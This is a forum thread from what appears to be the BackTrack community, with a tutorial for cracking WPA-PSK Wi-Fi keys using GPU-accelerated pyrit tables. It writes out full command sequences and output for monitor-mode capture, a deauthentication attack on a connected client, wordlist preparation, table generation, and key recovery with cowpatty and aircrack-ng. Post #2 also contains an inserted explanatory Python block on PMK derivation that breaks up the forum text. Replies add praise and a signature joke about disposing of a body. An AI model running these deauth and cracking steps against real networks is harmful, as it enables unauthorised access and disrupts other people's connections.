
Thread: pyrit CUDA nvidia Tutorial + Nvidia overclock instructions

  1. #1
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    pyrit CUDA nvidia Tutorial + Nvidia overclock instructions

    OK, so here we are with a fresh new release and, people, let's be honest, we want to see something new. Well, this is one of BT4's new exciting features.

    WPA hash table generation using CUDA/Nvidia GPU power.

    First thing to do is check if your card is supported for this technology http://en.wikipedia.org/wiki/CUDA#Supported_GPUs

    So let's get started...

    I'm going to assume that if you're reading this you have no clue what you're doing, so I will try to go from A-Z on this.

    So let's boot our disk, and when we get to the framebuffer console prompt (that's before you startx) we are going to install the nvidia kernel module.
    Code:
    root@bt:~# cd /opt/cuda/
    root@bt:/opt/cuda# ls
    CUDA_INSTALL  cuda-set-env.sh  nv_20090130-1_i386.deb
    root@bt:/opt/cuda# bash CUDA_INSTALL
    You will get some output and then you will be asked to overwrite your current xorg.conf. Take the default here, which is no.
    Next, let's install the driver.
    Code:
    root@bt:~# modprobe nvidia
    root@bt:~# depmod -a
    OK, so that's done. Now, since we've totally borked our xorg.conf, we should generate a new one.
    Code:
    root@bt:~# X -configure
    That will save the new one in /root and we will have to copy it over by hand.
    Code:
    root@bt:~# cp xorg.conf.new  /etc/X11/xorg.conf
    At this point we should be able to either startx or use the new bt4-crystal window manager. (shameless plug for me and j0rgan here)

    OK, so if everything went well you are looking at your desktop.

    Now, before we get to cracking, pyrit has a benchmark utility we can use to see if we are good to go.
    Code:
    root@bt:/pentest/password/pyrit# python pyrit.py benchmark
    The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
    This code is distributed under the GNU General Public License v3
    
    The ESSID-blobspace seems to be empty; you should create an ESSID...
    Available cores: 'Standard CPU', 'Nvidia CUDA'
    Testing CPU-only core 'Standard CPU' (4 CPUs)...  1294.58 PMKs/s
    
    Testing GPU core 'Nvidia CUDA' (Device 'GeForce 8800 GT')...  5409.43 PMKs/s
    As you can see, my 8800gt is roughly 5 times faster than my Q6600 quad-core chip running at 3.6 GHz.

    OK, swell, so that works. Now what we need is a .cap file. I'm assuming everyone can do this, but I will show it anyway.
    Code:
    root@bt:~# ifconfig wlan0 up
    root@bt:~# airmon-ng start wlan0
    root@bt:~# airodump-ng -w cudacapture mon0
    OK, so let's do a little scan of my house.


    As you can see, I have 2 dd-wrt routers on at the moment and my wife is connected to ddwrt1 feeding her new facebook addiction.
    Let's deauth her a$$
    Code:
    root@bt:~# aireplay-ng -0 10 -a 00:1d:7e:f0:a5:8f -c 00:13:02:a7:dd:53 mon0
    01:13:28  Waiting for beacon frame (BSSID: 00:1D:7E:F0:A5:8F) on channel 6
    01:13:29  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [25|68 ACKs]
    01:13:30  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [ 3|63 ACKs]
    01:13:31  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
    01:13:32  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
    01:13:33  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|63 ACKs]
    01:13:34  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
    01:13:35  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
    01:13:36  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [ 5|64 ACKs]
    01:13:37  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [11|64 ACKs]
    01:13:38  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
    Now let's check for success.
    Code:
    root@bt:~# aircrack-ng cudacapture-01.cap
    Opening cudacapture-01.cap
    Read 5612 packets.
    
       #  BSSID              ESSID                     Encryption
    
       1  00:1D:7E:F0:A5:8F  ddwrt1                    WPA (1 handshake)
       2  00:1D:7E:64:9A:7C  ddwrt2                    WPA (0 handshake)
       3  00:21:29:84:11:FD  CookNet                   WEP (34 IVs)
       4  00:0C:41:3E:2D:66  linksys                   None (192.168.1.1)
       5  00:12:0E:7B:02:78  WEST7359                  No data - WEP or WPA
       6  00:1A:70:83:B0:1C  linksys                   None (0.0.0.0)
       7  00:13:46:44:A5:CE  default                   WEP (11 IVs)
       8  00:14:6C:F6:36:78  CBC                       None (0.0.0.0)
       9  00:06:25:DB:3E:7B  linksys                   None (0.0.0.0)
      10  00:1B:2F:63:7C:50  PawsWithPurpose           No data - WEP or WPA
      11  00:21:29:9A:E6:3C  Bigfoot                   No data - WEP or WPA
      12  00:1C:10:89:16:76  linksys                   None (0.0.0.0)
    
    Index number of target network ?
    Looks like we got one.
    I'm going to start a new post for part 2.

  2. #2
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    pyrit CUDA nvidia Tutorial part 2

    Okay, so we got a handshake; now what?

    First off we need to grab a dictionary file.
    Code:
    root@bt:~# wget http://www.outpost9.com/files/wordlists/dic-0294.zip
    --2009-02-11 01:17:53--  http://www.outpost9.com/files/wordlists/dic-0294.zip
    Resolving www.outpost9.com... 12.180.200.208
    Connecting to www.outpost9.com|12.180.200.208|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 3283473 (3.1M) [application/zip]
    Saving to: `dic-0294.zip'
    
    100%[=============================================================================================================>] 3,283,473    268K/s   in 9.2
    root@bt:~# unzip dic-0294.zip 
    Archive:  dic-0294.zip          
      inflating: dic-0294.txt
    Then we need to strip out the stuff we don't need.
    Code:
    root@bt:~# cat dic-0294.txt | sort | uniq | pw-inspector -m 8 -M 63 > wpa.lst
    root@bt:~# wc -l wpa.lst 
    597532 wpa.lst
    So about six hundred thousand words.

    Now we got a file to work with. Now for the fun part.
    Code:
    root@bt:~# cd /pentest/password/pyrit/
    root@bt:/pentest/password/pyrit#
    Add our ESSID.

    Code:
    root@bt:/pentest/password/pyrit# python pyrit.py -e ddwrt1 create_essid
    The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
    This code is distributed under the GNU General Public License v3
    
    Created ESSID 'ddwrt1'
    Import our new WPA list.

    Code:
    root@bt:/pentest/password/pyrit# python pyrit.py -f /root/wpa.lst import_passwords
    The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
    This code is distributed under the GNU General Public License v3
    
    Importing from  '/root/wpa.lst'
    597532 lines read. All done.
    And start the table generation.

    Code:
    root@bt:/pentest/password/pyrit# python pyrit.py batchprocess
    The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
    This code is distributed under the GNU General Public License v3
    
    Using default core 'Nvidia CUDA' (Device 'GeForce 8800 GT')
    Working on ESSID 'ddwrt1'
    Reading unit '1ec5841a057928e33972489b461cb914' (54072 passwords buffered)  
     All done, computed 54072 PMKs in 10.47 seconds, 5164.13 PMKs/s)
    Reading unit '6c9303c848ed6a4473221229d4387934' (54996 passwords buffered)  
     All done, computed 54996 PMKs in 10.79 seconds, 5099.30 PMKs/s)
    Reading unit '70ded804144475dbc58b982625483821' (56076 passwords buffered)  
     All done, computed 56076 PMKs in 10.74 seconds, 5223.29 PMKs/s)...
    
    ...Reading unit 'f384ca460307a079503db313ece6806e' (53808 passwords buffered)  
     All done, computed 53808 PMKs in 10.67 seconds, 5044.67 PMKs/s)
    Reading unit '1bf464713cab79da5efc8503e8f28812' (17496 passwords buffered) 
     All done, computed 17496 PMKs in 3.23 seconds, 5422.30 PMKs/s)
    
    Batchprocessing done.
    So if everything went well you are at this point. Pyrit has the ability to output to cowpatty or airolib-ng files. For the sake of this tutorial I will be using cowpatty because I've found it's faster.

    So let's make our cowpatty file.
    Code:
    root@bt:/pentest/password/pyrit# python pyrit.py -e ddwrt1 -f cow.out export_cowpatty
    The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
    This code is distributed under the GNU General Public License v3
    
    Exporting to 'cow.out'...
    4656218 entries written. All done.
    Okay, so let's see how fast this will go.
    Code:
    root@bt:~# cd /pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty/
    root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty# ls
    AUTHORS    COPYING     cowpatty.h  eap-test.dump  fpga.c  genpmk.c  Makefile  md5.o       sha1.c  TODO     utils.o
    CHANGELOG  cowpatty    cowpatty.o  FAQ            fpga.o  genpmk.o  md5.c     radiotap.h  sha1.h  utils.c  wpa2psk-linksys.dump
    common.h   cowpatty.c  dict        file_magic     genpmk  INSTALL   md5.h     README      sha1.o  utils.h  wpapsk-linksys.dump
    root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty# ./cowpatty
    cowpatty 4.3 - WPA-PSK dictionary attack. <jwright@hasborg.com>
    cowpatty: Must supply a list of passphrases in a file with -f or a hash file
              with -d.  Use "-f -" to accept words on stdin.
    
    Usage: cowpatty [options]
    
            -f      Dictionary file
            -d      Hash file (genpmk)
            -r      Packet capture file
            -s      Network SSID (enclose in quotes if SSID includes spaces)
            -F card Use FPGA acceleration
            -h      Print this help information and exit
            -v      Print verbose information (more -v for more verbosity)
            -V      Print program version and exit
    
    root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty# ./cowpatty -d /pentest/password/pyrit/cow.out -s ddwrt2 -r /root/cudacapture-01.cap
    cowpatty 4.3 - WPA-PSK dictionary attack. <jwright@hasborg.com>
    
    Collected all necessary data to mount crack against WPA2/PSK passphrase.
    Starting dictionary attack.  Please be patient.
    key no. 1000: Mathboldit1
    key no. 2000: llegando2
    key no. 3000: shougakukan123
    key no. 4000: DISGUISING
    key no. 5000: Graffaloy
    key no. 6000: Passibleness123
    key no. 7000: Unmaking2
    key no. 8000: Procanal123
    So this is the cracking process...

    Code:
    4656217 passphrases tested in 24.84 seconds:  187468.86 passphrases/second
    root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty#
    And just to show you what it would be like without the hash file...

    Code:
    root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty# ./cowpatty -f /root/wpa.lst -s ddwrt2 -r /root/cudacapture-01.cap
    
    27824 passphrases tested in 84.98 seconds:  327.40 passphrases/second
    That's a HUGE difference.
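The speed difference in the two cowpatty runs above comes down to one function: WPA-PSK derives the Pairwise Master Key as PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes), and the table built by pyrit simply stores those 4096-iteration results ahead of time. The following Python block is an added illustration, not code from pureh@te's posts or from pyrit: it implements the same passphrase rule that the `pw-inspector -m 8 -M 63` step enforces (8 to 63 printable ASCII characters), derives the PMK with the standard library, and shows why the ESSID acts as a salt, so a table generated for one network name contains nothing usable for another. The wordlist entries are constructed sample data; the ESSID names only mirror the tutorial.

```python
import hashlib

# Constructed sample wordlist (not from the thread's capture or wordlist):
# it deliberately mixes legal passphrases with entries the WPA rule rejects.
SAMPLE_WORDLIST = [
    "short",                 # too short (< 8 chars)
    "metasploit",
    "metasploit",            # duplicate, removed like `sort | uniq`
    "correcthorsebattery",
    "x" * 64,                # too long (> 63 chars)
    "Passibleness123",
    "caf\u00e9s-and-more",   # non-ASCII, not a legal WPA-PSK passphrase
]


def is_valid_wpa_passphrase(passphrase: str) -> bool:
    """True if passphrase is a legal WPA-PSK passphrase: 8 to 63 printable
    ASCII characters (0x20-0x7E). This is the constraint pw-inspector
    -m 8 -M 63 applies to the wordlist in the tutorial."""
    if not 8 <= len(passphrase) <= 63:
        return False
    return all(0x20 <= ord(ch) <= 0x7E for ch in passphrase)


def filter_wordlist(words):
    """Mirror `sort | uniq | pw-inspector -m 8 -M 63`: deduplicate, drop
    entries that can never be a WPA-PSK passphrase, return sorted list."""
    return sorted({w for w in words if is_valid_wpa_passphrase(w)})


def derive_pmk(passphrase: str, essid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, essid, 4096 iterations, 32 bytes),
    the WPA-PSK key derivation from IEEE 802.11i. The ESSID is the salt,
    so the same passphrase yields a different PMK on every network name."""
    if not is_valid_wpa_passphrase(passphrase):
        raise ValueError("WPA-PSK passphrase must be 8-63 printable ASCII characters")
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("ascii"), essid.encode("utf-8"), 4096, dklen=32
    )


def build_pmk_table(essid: str, words):
    """Precompute {pmk: passphrase} for ONE ESSID. The 4096 PBKDF2 rounds
    are the expensive part; a table trades that CPU/GPU time for storage,
    which is why the -d run above is hundreds of times faster than -f."""
    return {derive_pmk(w, essid): w for w in filter_wordlist(words)}


def lookup_pmk(table, pmk: bytes):
    """Return the passphrase for a PMK, or None if the table has no entry."""
    return table.get(pmk)


def table_is_essid_bound(passphrase: str, essid_a: str, essid_b: str, words) -> bool:
    """Defensive point of the whole exercise: a table built for essid_a
    resolves the passphrase under essid_a but holds nothing for essid_b.
    A non-default, unique SSID therefore invalidates every precomputed table."""
    table = build_pmk_table(essid_a, words)
    hit_same = lookup_pmk(table, derive_pmk(passphrase, essid_a))
    hit_other = lookup_pmk(table, derive_pmk(passphrase, essid_b))
    return hit_same == passphrase and hit_other is None


if __name__ == "__main__":
    # Known IEEE 802.11i test vector: passphrase "password", SSID "IEEE".
    print(derive_pmk("password", "IEEE").hex())
    print(filter_wordlist(SAMPLE_WORDLIST))
    print(table_is_essid_bound("metasploit", "ddwrt1", "ddwrt2", SAMPLE_WORDLIST))
```

The `derive_pmk` output for the IEEE test vector ("password" / "IEEE") can be checked against the value published in the 802.11i annex; the table check shows that the ESSID-bound table makes the 4656218-entry cow.out file above useful only against the network it was generated for.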

  3. #3
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    pyrit CUDA nvidia Tutorial part 3

    So you would rather use the airolib-ng option because you love aircrack. That can be done as well, like this...

    Back up to right before we created the cow.out table and use these commands instead.

    Create the database (pyrit won't do it for you for some reason).
    Code:
    root@bt:/pentest/password/pyrit# airolib-ng testdb -import essid ddwrt1 
    Database <testdb> does not already exist, creating it...
    Database <testdb> sucessfully created
    Could not open file/stream for reading.
    Then output to our newly created database.

    Code:
    root@bt:/pentest/password/pyrit# python pyrit.py -e ddwrt1 -f testdb export_hashdb
    The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
    This code is distributed under the GNU General Public License v3
    
    Exporting ESSID 'ddwrt1'
    Okay... this takes a little longer than the cowpatty tables due to SQL stuff, but the advantage of airolib-ng is it can use HUGE files, while I think cowpatty fails with hash files over 2 gigs.

    Once it's done we can use aircrack.
    Code:
    root@bt:/pentest/password/pyrit# aircrack-ng -r testdb /root/cudacapture-01.cap 
    Opening /root/cudacapture-01.cap
    Read 10561 packets.
    
       #  BSSID              ESSID                     Encryption
    
       1  00:1D:7E:F0:A5:8F  ddwrt1                    WPA (1 handshake)
       2  00:1D:7E:64:9A:7C  ddwrt2                    WPA (0 handshake)
       3  00:21:29:84:11:FD  CookNet                   WEP (93 IVs)
       4  00:0C:41:3E:2D:66  linksys                   None (192.168.1.1)
       5  00:12:0E:7B:02:78  WEST7359                  No data - WEP or WPA
       6  00:1A:70:83:B0:1C  linksys                   None (192.168.1.1)
       7  00:13:46:44:A5:CE  default                   WEP (28 IVs)
       8  00:14:6C:F6:36:78  CBC                       None (0.0.0.0)
       9  00:06:25:DB:3E:7B  linksys                   None (0.0.0.0)
      10  00:1B:2F:63:7C:50  PawsWithPurpose           No data - WEP or WPA
      11  00:21:29:9A:E6:3C  Bigfoot                   No data - WEP or WPA
      12  00:1C:10:89:16:76  linksys                   None (0.0.0.0)
      13  00:18:3A:3A:B2:B5                            No data - WEP or WPA
      14  00:12:0E:6E:FE:6B  WEST3306                  No data - WEP or WPA
    
    Index number of target network ? 1
    Select the network and let her rip.

    Code:
                                     Aircrack-ng 1.0 rc2 r1385
    
    
                       [00:00:38] 4315315 keys tested (112595.70 k/s)
    
    
                              KEY FOUND! [ metasploit ]
    
    
          Master Key     : F4 AB C6 2A 18 F8 89 9B 6A 70 3D 5F EB 0D F4 F9 
                           F8 F8 51 48 25 3E C3 61 EA 54 17 3D D3 84 18 AC 
    
          Transient Key  : 11 A0 36 8F 96 63 64 7F 63 A1 08 35 73 82 96 AE 
                           49 E1 BE 68 F7 7E 8D 98 57 28 C2 E1 DE AC F2 AC 
                           68 00 43 B9 88 8E 96 57 7A BF E2 62 DB DE 6A 1B 
                           BF 53 10 26 D1 D8 32 47 BC A6 F5 86 F1 83 23 11 
    
          EAPOL HMAC     : 68 AE A8 82 57 7C 3D 89 6E BC BD C1 46 8E 34 AD 
    
    
    Quitting aircrack-ng...
    Well, that's IT! Thanks for listening/reading.

  4. #4
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008


    Beautiful! Thank you for the write up, this is one of the features that I really hoped would be incorporated into BT4.
    -Monkeys are like nature's humans.

  5. #5
    My life is this forum Barry's Avatar
    Join Date
    Jan 2010
    Posts
    3,817


    Dude, that's cool. Now figure out how to use all your nvidia cards in your SuperAwesomeSuperComputer at the same time.
    Of course, if you really wanted to have some fun, go to Wal-Mart late at night and ask the greeter if they could help you find trashbags, roll of carpet, rope, quicklime, clorox and a shovel. See if they give you any strange looks. --Streaker69

  6. #6
    Member
    Join Date
    Jun 2008
    Posts
    101

    Wonderful starting point for BT4 Beta!! Shame on me for not having an Nvidia card to test it out. I used to get 10,000 k/s with a pre-hashed airolib database; what you are getting is just insane.
    QuadCore AMD Phenom X4 9950, 2600 MHz
    8GB DDR2 800MHz
    Dual Boot System: Windows Server 2008 x64 w/ Hyper-V, Ubuntu 9.10 x64

  7. #7
    My life is this forum Barry's Avatar
    Join Date
    Jan 2010
    Posts
    3,817

    Quote Originally Posted by adri_ht_ View Post
    Wonderful starting point for BT4 Beta!! Shame on me for not having an Nvidia card to test it out. I used to get 10,000 k/s with a pre-hashed airolib database; what you are getting is just insane.
    Heh, I don't even have a computer that's compatible (or new enough) with the nvidia cards that work with pyrit...
    Of course, if you really wanted to have some fun, go to Wal-Mart late at night and ask the greeter if they could help you find trashbags, roll of carpet, rope, quicklime, clorox and a shovel. See if they give you any strange looks. --Streaker69

  8. #8
    Senior Member kidFromBigD's Avatar
    Join Date
    Jan 2010
    Location
    Texas
    Posts
    159


    Quote Originally Posted by pureh@te View Post
    Lets deauth her a$$
    ...My favorite quote from your tutorial.

    Thanks for posting this. Yes, it is time to upgrade my hardware to something that takes advantage of the GPU power. I'd like to see follow-up posts from other members with GTX-200 series cards. Those numbers should be off the charts.

  9. #9
    Just burned his ISO
    Join Date
    Jan 2008
    Posts
    7

    Does this mean if my MB has built-in ATI graphics it will not work? I do have an nvidia 6600 series card lying around; will it work?

  10. #10
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    The onboard card shouldn't matter. If you have an nvidia card in the PCI slot it should get detected. Some of the newer nvidia stuff doesn't even have VGA outs; it's only for computing.

    Like this one I'm saving up for...

    http://www.nvidia.com/object/product..._c1060_us.html


    You can check for your card here:

    http://en.wikipedia.org/wiki/CUDA#Supported_GPUs
